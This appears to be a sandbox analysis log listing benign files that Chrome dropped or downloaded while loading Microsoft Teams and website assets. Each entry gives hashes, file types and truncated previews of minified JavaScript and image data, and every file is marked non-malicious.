                                                                                                                                                                                                                          Preview:navigator&&navigator.connection&&(window.networkInfo=navigator.connection,navigator.connection.addEventListener&&navigator.connection.addEventListener("change",({target:n})=>window.networkInfo=n));.const imageObserver=new IntersectionObserver((e,r)=>{var a=e=>{if(e.hasAttribute("data-lazyimg")){var t=e.getAttribute("data-srclazy");let o=e.getAttribute("data-srcsetlazy")||"";if(t&&(e.src=t),o&&window.networkInfo){var n=window.networkInfo.downlink;const r=[{min:0,max:5,regex:/(.*?(?=, ))/,qMod:!0},{min:5,max:8,regex:/(.*2x)/}];r.forEach(({min:e,max:t,regex:r,qMod:a})=>{e<=n&&n<t&&(r=o.match(r),o=(r&&r.length?r[0]:o)+(a?"/qt=q:"+Math.round((n-e)/(t-e)*100):""))})}e.srcset=o,e.removeAttribute("sizes"),e.removeAttribute("data-lazyimg"),e.removeAttribute("data-srclazy"),e.removeAttribute("data-srcsetlazy")}};e.forEach(e=>{if(e.isIntersecting){const t=e.target;window.networkInfo&&0===window.networkInfo.downlink||([t].concat(Array.from(t.querySelectorAll("[data-lazyimg]"))).forEach(a),r.unobse
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 201 x 66, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4368
                                                                                                                                                                                                                          Entropy (8bit):7.904230813033952
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:fE27X5Cxp71QVna2bEuFFsB6MmlNEw57Udi9xMTRpTNs8sard/IprYk:8pfkaOj7s7mP/JalpT1Hk
                                                                                                                                                                                                                          MD5:C9BE91C440124080D52A6AE7404B3121
                                                                                                                                                                                                                          SHA1:7878C424083D8C54FDE56D390617ADF76A81E5FD
                                                                                                                                                                                                                          SHA-256:17520553FF08CFE90F6C59E3759C7E53EB601C8C5A05C3EA3D1135D2DE2F05C6
                                                                                                                                                                                                                          SHA-512:1497680D7DD134E2AEF2586BB57394C3DC1BB073ADB81B988836CA548280EB5B26F4134FFFA710390F5B9C5576C29C405EE4B774A191BB9AB5A5E6E729295F8B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:.PNG........IHDR.......B......o.,....PLTELiqSQSTRSSRR]WVQPQWUV53<o..\MO...UTUYZ\VUUMLL..E]\][[]USU...YWX][\ZXZVSTYXX[ZZZYZZZYPPPYXY\[[WVW_]^[YZ.;]Z[VTV...YXY..._^`...NMM...WVV\[[.Q,ZYZ[Z[GFG...`^^ZYZ[Z[\YZ...[YZYXY|...#..._]^_]_LKLPNOZZZXVW...]Z[RQR^\^...SRR4..\[\zpuPNNVUU...b`aUTUa_`..b_aXVWede.'\ZZYVW.Q'...]\]b`a]\]\[\VVV. ....S%SQScabZXYb_a...RPPRQQ]\]fdeRQRUUU..(...YXWmkm......YXXMLM.R$.R0b`a.[5QOP.....E..-.'........0...[ARPP;;;XUV.. ....V*cbc.O,RQQ+*,..dbb..0....U2...^ ..).....).a .[9hegdce..heg....B...hgh8..aaa.J%.. .L#dbc..E..........<......"..#..3.!..'..........+[YZ...7..ifh.Y=.........R......!.._\].7.?.\<.X-..-.sV.eJ.... ..E.T6....A....%.T(..3.X;.......5...r/.\,J..a__.X<.jH......R/..xa.x._KL..qvU..*.Q....~............O$...{...P.........S.....T)|..^\].......T0.R......tRNS...!.......%.....*3.~.N.i.p.7H./.:..Z.....*............V..B..T>dC._...O.GM.......V....y.=.......j...a.O.....vH...V.......[..r0.......#.{......_......@........W.....&..j.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):75729
                                                                                                                                                                                                                          Entropy (8bit):5.460910037528449
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:dIgGLV8OiLPwDCTx2rv59HDxrogYheDtiLDS/bz1N:dLhOtyx2b59HDJFtiqN
                                                                                                                                                                                                                          MD5:D2D1ADC30FA342C0FD93E5097327E2D4
                                                                                                                                                                                                                          SHA1:2AE9A1E70536D096878554727220A33C124A22BC
                                                                                                                                                                                                                          SHA-256:D388081E845E73805EC7FFCC94D88A1A74240460DAD4BA0602454B755983A0FF
                                                                                                                                                                                                                          SHA-512:26FDFB44AE4D2CC1B17415B7893CC75A6AE7395DF5F96DCE2C805D5D10B3631EDBACFFB33E7C94B7CC53489E9965E40A3C516C42FBBC884D08EF3795223AFD01
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[653800],{600093:(e,t,n)=>{var a,i;n.d(t,{d:()=>a,J:()=>i}),function(e){e.HighMemoryUsage="HighMemoryUsage",e.CallingStackInitTimeoutOrFailure="CallingStackInitTimeoutOrFailure",e.GroupCallTimeoutOrFailure="GroupCallTimeoutOrFailure"}(a||(a={})),function(e){e.MeetingsAudio="1",e.MeetingsVideoOrScreenSharing="2",e.CallingCallDrops="3",e.MessagingOther="5",e.ActivityFeed="6",e.Crashing="7",e.Files="8",e.SearchSERPSearchResultsPage="9",e.SearchPowerbarAutosuggest="10",e.Other="11",e.MeetingsLiveCaptionsOrTranscript="14",e.TeamsChannelsMembership="15",e.Accessibility="17",e.Calendar="18",e.MeetingsOther="19",e.PlatformApps="20",e.PlatformBotsConnectors="21",e.PlatformTabs="22",e.TeamsChannelsCreateManageSettings="23",e.MessagingSync="25",e.PeopleProfiles="26",e.StatusPresence="27",e.TeamsChannelsPrivateAndSharedChannels="28",e.LocalizationTranslation="29",e.MeetingsAgendaNotes="30
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):450575
                                                                                                                                                                                                                          Entropy (8bit):4.738673450934081
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:ABOqzit4k1ed23gkfpJW7yULUCpgcSylqfSlUi:ABvFkfpE1L
                                                                                                                                                                                                                          MD5:FACD97157A01E906C8CB400A58EA09A9
                                                                                                                                                                                                                          SHA1:33B478322ED8FFCE14CE1B6EBE6486DE5FF3BCE5
                                                                                                                                                                                                                          SHA-256:147C29E9E79D3671ECE805CFD53774C50DC045F7248D29CA906BF1705F17BDDC
                                                                                                                                                                                                                          SHA-512:C5D724A9565145F17363CC193538F569466C96B92CC52FF83CE55C3AB3DBE51C7C3A6E9DC17EC95B855D214E1BB1491E398F74FE74FD5C4FF845D581FD3DD778
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[413749],{114623:(e,t,a)=>{a.r(t),a.d(t,{default:()=>i});const i={namespace:"calling",locale:"en-us",translations:{aa_permission_error_header_description:"You are no longer authorized for this auto attendant",acccepted_elsewhere_call_timeline_description_label:"Answered by {{acceptedElsewhereParticipantName}}",active_in_call_with:"is in call with {{caller}}",activity_date_today:"Today",add_a_room_close_button:"Close",add_a_room_enable_bluetooth_subtitle:"Turn on Bluetooth to automatically detect nearby rooms.",add_a_room_no_rooms_text:"Didn't find any Teams rooms nearby",add_a_room_other_suggestions:"Other Suggestions",add_a_room_screen_title:"Nearby Rooms",add_a_room_searching_text:"Searching for nearby Teams Rooms...",add_a_room_title:"Add a room",add_address:"Add",add_address_aria_label:"Add location",add_emergency_address:"Add",add_menu_option:"Add new option",add_new_addr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1211)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1261
                                                                                                                                                                                                                          Entropy (8bit):5.340315611373646
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:/BLEQuC0F6lq5lEYwy5WqogVeESgVeId4PXsHrIW:Z4jFYq5lpwW7vdd4PXgrIW
                                                                                                                                                                                                                          MD5:CB9BFA0FBDD957FBE7F4841B70341DB2
                                                                                                                                                                                                                          SHA1:9CAD12A3580D3E4D340CB867E88B687C75564C5A
                                                                                                                                                                                                                          SHA-256:513864FD4EBD1926F3E1E78B436A90C2BC3A5D16835B50415E7B318D7DEEC2A2
                                                                                                                                                                                                                          SHA-512:DF98C3262F64DA4EA9CACF75FF7CB685D71B69142D89F726AB3E13CF6F25432DC395D7C0950E1632F0E519F135B02FDA0753739189E51F1C9210ACA6692551DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/lib/components/ColorSwatch-4196a0a9.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/ColorSwatch-4196a0a9.js",["exports"],(function(e){"use strict";const o=e=>{let{color:o,isActive:t,inStock:r,isSmall:l}=e;const a=r||void 0===r,c=l?"24px":"38px",n=l?"20px":"32px",i={borderRadius:"50%",borderWidth:"1px",borderStyle:"solid"},s={outer:{...i,display:"flex",alignItems:"center",justifyContent:"center",width:c,height:c,borderColor:t?"lowContrast":"transparent"},inner:{...i,borderColor:"ultraLowContrast",color:"ultraLowContrast",width:n,height:n,background:a?o:`linear-gradient(to left top, ${o} calc(50% - 1px), currentColor, ${o} calc(50% + 1px) )`}};return(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.outer},(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.inner}))};o.propTypes={color:(global.PropTypes||guac["prop-types"]).string.isRequired,isActive:(global.PropTypes||guac["prop-types"]).bool,inStock:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31824)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31932
                                                                                                                                                                                                                          Entropy (8bit):5.402734890306889
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:YAFc8qHGsxF3tPtO8ZD6C8pdM3TFDBb8TmUGa31tYb+t0CHkff3BZCNP3HV6gWXl:Zw3prFtambRCgCNP3HV6F
                                                                                                                                                                                                                          MD5:E145B4A903B78134C9726DD10EC3F55E
                                                                                                                                                                                                                          SHA1:9918DD6BD46FAEDA4948AE6E752C97FF39A42232
                                                                                                                                                                                                                          SHA-256:834441EEAEC598092406D14EBAB207C8364182C5495ECD60AC52BAA8615DEEDD
                                                                                                                                                                                                                          SHA-512:F473F48DC6A70FB5C42BEA42D1D01A9C13E4FF2F3DAF67C76520821F8BF72E0B23687DD0235D0471EE8BD15B2CFC124DFBE04DE6E819486B7D18523FA37477A8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[526413,631106],{609949:(e,t,l)=>{l.d(t,{L1:()=>m});var a,o=l(277362),i=l(305536);!function(e){e[e.PngAndHtmlCopied=0]="PngAndHtmlCopied",e[e.HtmlCopied=1]="HtmlCopied"}(a||(a={}));const n=new Map;async function r(e,t,l){const o=e.document,r=new Promise((async(l,a)=>{try{let o=await t;const i=new URL(o.src);if(!(e.location.origin===i.origin||"data:"===i.protocol))try{o=await c(e,o.src)}catch(e){a(new Error(`copyImageElementToClipboard: error on same-origin image load "${e.message}"`))}o.complete?l(o):s(o,(()=>{l(o)}),(e=>{a(new Error(`copyImageElementToClipboard: error on image load "${e.message}"`))}))}catch(e){a(e)}})),d=new Promise((async(e,t)=>{try{const l=await r,a=o.createElement("canvas");a.width=l.naturalWidth,a.height=l.naturalHeight;const i=a.getContext("2d");i?(i.drawImage(l,0,0),e(a)):t(new Error("copyImageElementToClipboard: failed to get canvas 2d context."))}cat
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):97386
                                                                                                                                                                                                                          Entropy (8bit):5.409202916101396
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:AYOFtBcBgh/A3ckqBWqnq/eygnuOXwWQa01bYO1MCt8q:AYOFCf/cq/NRr1MNCtF
                                                                                                                                                                                                                          MD5:DEB6CC65C69E068DFB8E094926954D7F
                                                                                                                                                                                                                          SHA1:1FB93B19BC2FA21B1BF08BE5916FB62D34F3438E
                                                                                                                                                                                                                          SHA-256:C6074B5366BBDEC84AAF41BC66C753A96F3850C5A9E3F8974073B32F2956CEE8
                                                                                                                                                                                                                          SHA-512:54DB639E45E7904BD9C3C36ED8C555FEBFD5CA1C8381E61056BE75B4138A6638B1120C031FFBCEF6D316C5150E47796A76B082D48E7D57237A10F69D11917D50
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/747607-e867fd4c0b2c8d0f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[747607],{872994:(n,t,e)=>{e.d(t,{_:()=>H});var r=e(340415),i=e(344411),u=e(759377),o=e(179233),a=e(680828),c=e(260026),f=e(215729),l=e(490507),s=e(722990),v=e(268288),d=e(498863),g=e(661187),h=e(952741),y=e(246904),p=e(483152),m=e(679080),b=e(779497),I=e(287856);var S,w=function(n){function t(){var e,r,u=n.call(this)||this;function a(){e=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,a(),(0,i.A)(t,u,(function(n,t){n.addTelemetryInitializer=function(n){return function(n,t,e){var r={id:t,fn:e};return(0,o.Yny)(n,r),{remove:function(){(0,o.Iuo)(n,(function(t,e){if(t.id===r.id)return n[c.Ic](e,1),-1}))}}}(r,e++,n)},n[y.qT]=function(t,e){(function(n,t,e){for(var r=!1,i=n[c.oI],u=0;u<i;++u){var a=n[u];if(a)try{if(!1===a.fn[c.y9](null,[t])){r=!0;break}}catch(n){(0,g.ZP)(e,2,64,"Telemetry initializer failed: "+(0,h.lL)(n),{exception:(0,o.mmD)(n)},!0)}}return!r}
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (44425)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):44533
                                                                                                                                                                                                                          Entropy (8bit):5.270142196256675
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:3jOT4igirpMPTfKC3hVf2prHPPjzJkGmdTgAWbh/kBmhwkBBkXboeb8hIqHGi8Kd:5CCfq1m6Qb+mi8Fvw+CO50SfcJ5Y8
                                                                                                                                                                                                                          MD5:B7289244C39667518303834AF67B17F2
                                                                                                                                                                                                                          SHA1:A08B19A0A3EB54A16976EC1A606504130ABBB467
                                                                                                                                                                                                                          SHA-256:D85996B603536F1616663A2D7077C2EAD6EA2F7BCC5108AA4C29051A52B57A68
                                                                                                                                                                                                                          SHA-512:7940135EF7D4DE0F1F38E7468413E1D4FA97C5B89AA1E91198BA8B4D1F3B91D366E3A2080ED008B2C587D57D7CA99CCECEF6C6375F3300373CD493499E63F5C9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/381452-be282a834691e600.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[381452],{95110:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,o=new Array(t);n<t;n++)o[n]=e[n];return o},e.exports.__esModule=!0,e.exports.default=e.exports},952002:(e,t,n)=>{var o=n(95110);e.exports=function(e){if(Array.isArray(e))return o(e)},e.exports.__esModule=!0,e.exports.default=e.exports},119666:(e,t,n)=>{"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{A:()=>o})},63428:(e,t,n)=>{"use strict";function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}n.d(t,{A:()=>i})},426220:(e,t,n)=>{"use strict";function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows icon resource - 18 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):172066
                                                                                                                                                                                                                          Entropy (8bit):4.32521391566617
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:Dg7Z3gHhMIW7F3TGUhxkZ1OgbC6kStqJ1L3mC3g9BQ0MRB3R9HwXOeOkccOOOOJW:07Z32hLWNTJhxiQACPStqzZw9ep3RV
                                                                                                                                                                                                                          MD5:247D14144A313421D8D84AA0EA54D249
                                                                                                                                                                                                                          SHA1:83BEFDD6EBA57FAA3D3074AA08A28A4E8D75076A
                                                                                                                                                                                                                          SHA-256:2D5AA67B8ACE13A94FD09316787E3C9ABA2ADAC767B6E2AB769A2265A2AD20F0
                                                                                                                                                                                                                          SHA-512:F2D79A2A75148EFAF90A4A92980E781B1F94A4A1034383FFE5749983085EF7EAFA29D4804094296B212795501B4B4A126BC47C24A91B60C24104BC4B24D99565
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/evergreen-assets/icons/microsoft_teams_logo_refresh.ico
                                                                                                                                                                                                                          Preview:...... ..........&...........(.......@@......(...6...00..........^... ...........*..........h....2........ .$5...8..``.... .....:m..PP.... ..g......HH.... ..T...i..@@.... .(B..R...<<.... .H:..z...00.... ..%...:..((.... .h...j`.. .... ......z........ .....z......... ............... .h.......(... ...@....................................................................................................................................................................................................................................DDD|...||x...||||||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L........|.....|@.............L...||x..|||||||H..................|||.............................||x..........................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1179)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1287
                                                                                                                                                                                                                          Entropy (8bit):5.226870802404122
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38nmCamm7wybSHIoWLTMz0r1eTM9oWoWOuTf+Udtk7Sz+KIJYbOc:wp3sp3j/VTMzBAfrf+wtXz1IOZ
                                                                                                                                                                                                                          MD5:B6D1A6A743B008B467C2395A4485F390
                                                                                                                                                                                                                          SHA1:899A6E8EE6B23EE0E49F0B89C33ED5CB4B722226
                                                                                                                                                                                                                          SHA-256:F1F36623804CDDD4D5A0FB0FD6C3C30E45FE86DBE5D7C2FAE78298F8E7545A36
                                                                                                                                                                                                                          SHA-512:49AEF8E6862D335E794C13A91651A3DE375B3A1AAD5604B73D015657DE39104D86C1283F5347B1D92C733449F53AC0DBF001A98DEE2C8C157EF793EF7EC01063
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[120951],{120951:(e,a,t)=>{t.d(a,{D:()=>i});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),r=t(829289),i=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},s.createElement("path",{className:n()(r.Q.outline,a.outlinePart),d:"M15.8527 7.64582C16.0484 7.84073 16.0489 8.15731 15.854 8.35292L10.389 13.8374C10.1741 14.0531 9.82477 14.0531 9.60982 13.8374L4.14484 8.35292C3.94993 8.15731 3.95049 7.84073 4.1461 7.64582C4.34171 7.4509 4.65829 7.45147 4.85321 7.64708L9.99942 12.8117L15.1456 7.64708C15.3406 7.45147 15.6571 7.4509 15.8527 7.64582Z"}),s.createElement("path",{className:n()(r.Q.filled,a.filledPart),d:"M15.793 7.73271C16.0787 8.03263 16.0672 8.50737 15.7672 8.79306L10.5168 13.7944C10.2271 14.0703 9.77187 14.0703 9.4822 13.7944L4.23173 8.79306C3.93181 8.50737 3.92028 8.03263 4.2059
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22637)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22745
                                                                                                                                                                                                                          Entropy (8bit):5.323982641842712
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:gxOaUKs4Lk5+4K+oaNlZFe2JgAf4MsehMINWsIpCeG:gxOaG4oNFJgA1skXb
                                                                                                                                                                                                                          MD5:B09B077BA8260002A8EADCD5EB4708B1
                                                                                                                                                                                                                          SHA1:506936BA470B4ADBBC2D737500DCA02496535545
                                                                                                                                                                                                                          SHA-256:377E85D7D26E4F888ECC278631C3362545B51A397CE6E74AAB3F1418DF5F8F7A
                                                                                                                                                                                                                          SHA-512:8E98EB4E1DA92332ABDB9ACBA83B1BF8347080B2C1236300081DB71404599D684A9724FEFCF714A121EBBC82D415E308152E34410791C2D38C4CD52A61D85732
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725973],{165451:(e,n,t)=>{t.d(n,{Q:()=>o});var r=t(240364),o=function(e){var n=(0,r.b)(Object.assign({},e,{vertical:!0}));return Object.assign({},n,{attributes:Object.assign({},n.attributes,{root:Object.assign({},n.attributes.root,{disabled:e.disabled,"aria-disabled":e.disabledFocusable})})})}},31007:(e,n,t)=>{t.d(n,{f:()=>C,K:()=>N});var r=t(112882),o=t.n(r),a=t(504405),s=t(382883),i=t(996665),l=t(301078),u=t(390956),c=t(31828),p=t(628266),d=t(152450),m=t(121121),f=t(62600),b=t(513432),v=t(382462),y=t(655008),g=t(278459),C="ui-toolbar__customitem",N=function(){var e=(0,s.A)((function(e,n,t){var r,s=(0,i.P3)(),f=(0,l.J)(t.displayName,s.telemetry),y=f.setStart,C=f.setEnd;y();var N=e.accessibility,P=e.children,h=e.className,k=e.content,I=e.design,O=e.fitted,S=e.focusable,T=e.styles,_=e.variables,w=b.useContext(g.g),E=(0,u.W)(N,{debugName:t.displayName,rtl:s.rtl}),F=(0,c.I)(t.di
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):542252
                                                                                                                                                                                                                          Entropy (8bit):5.737556808915014
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:YrvH0N4mj8aOxd2TEvqMZ1M9Cjd2OfZitd2TEi:OUN4muccqMZ1M9Cjdlfktcv
                                                                                                                                                                                                                          MD5:BEB098050EFB7158FB14C734183EB402
                                                                                                                                                                                                                          SHA1:B18B6CA2ABBDEACB94801961AD3318FA17E827B7
                                                                                                                                                                                                                          SHA-256:F3E83CF57A793389E1AA535D2664D838C7BE4ACD8D6B836BA607A975354817AD
                                                                                                                                                                                                                          SHA-512:5CE2909ED577E8E8554F963E3FFFD4B061DB852D1954041D2A6672559EE8EA210B136E90E6F27C93D4ABD681FE92490BD5D089DBECDF639962E308F517686237
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[13290],{78727:(e,t,n)=>{e.exports=n.p+"133bf0a0b104ec3dfc5b9ab207e54873.svg"},960935:(e,t,n)=>{e.exports=n.p+"c52bdfa460d7b878541ff0d9833e3c7b.svg"},870586:(e,t,n)=>{e.exports=n.p+"93bf1cc8b8b8092aab2c385d85d22c8d.svg"},834818:(e,t,n)=>{e.exports=n.p+"79f07ba26ed583574678b31546848509.svg"},603313:(e,t,n)=>{e.exports=n.p+"33c8b3e3c8d71273ed9abc4d1bec9bcc.svg"},567322:(e,t,n)=>{e.exports=n.p+"5d07fdf28991f39897b8734021141a6f.svg"},604322:(e,t,n)=>{e.exports=n.p+"0d10d16cedc7b8262d0863ae455bb683.svg"},791542:(e,t,n)=>{e.exports=n.p+"774888c01ebff051c2cad178c17079b3.svg"},118356:(e,t,n)=>{e.exports=n.p+"36fd037c0c6525c9044c5c8ef757c740.svg"},952388:(e,t,n)=>{e.exports=n.p+"5066e146579e847ea9f2d818aab586bb.svg"},152248:(e,t,n)=>{e.exports=n.p+"7aa4c2455abe8a0c8cfa1e8e4b93494c.svg"},444257:(e,t,n)=>{e.exports=n.p+"e0420569cdac40ed7e659a1dae697de8.svg"},698037:(e,t,n)=>{"use strict";n.d(t,{hT:()
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):526300
                                                                                                                                                                                                                          Entropy (8bit):5.258891914056111
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:jCalLBeHIAVnh/Cst91N6FGGaUgsEheT4/BEKQo3gAlyRirdpzoyU:jhOBCstCTPyU
                                                                                                                                                                                                                          MD5:1F4ABBBDAD2B4C6EC49EE626C6F03453
                                                                                                                                                                                                                          SHA1:4566AA559176E9F485220533855045D29ED6DF3E
                                                                                                                                                                                                                          SHA-256:2B657AA41B1E9AC6BC291193C145B6D2045E6CD6AABE6A56F107B7983E32A432
                                                                                                                                                                                                                          SHA-512:44F0D68D086899E4C0B8B6C3BEBB7EBA69EB06FC3AECC81E664FA6F1A71FCC3B916DD73281A14C2A8AA0CF7A4412995D34698E4248A68FFDD20CAFBB9412F2FB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
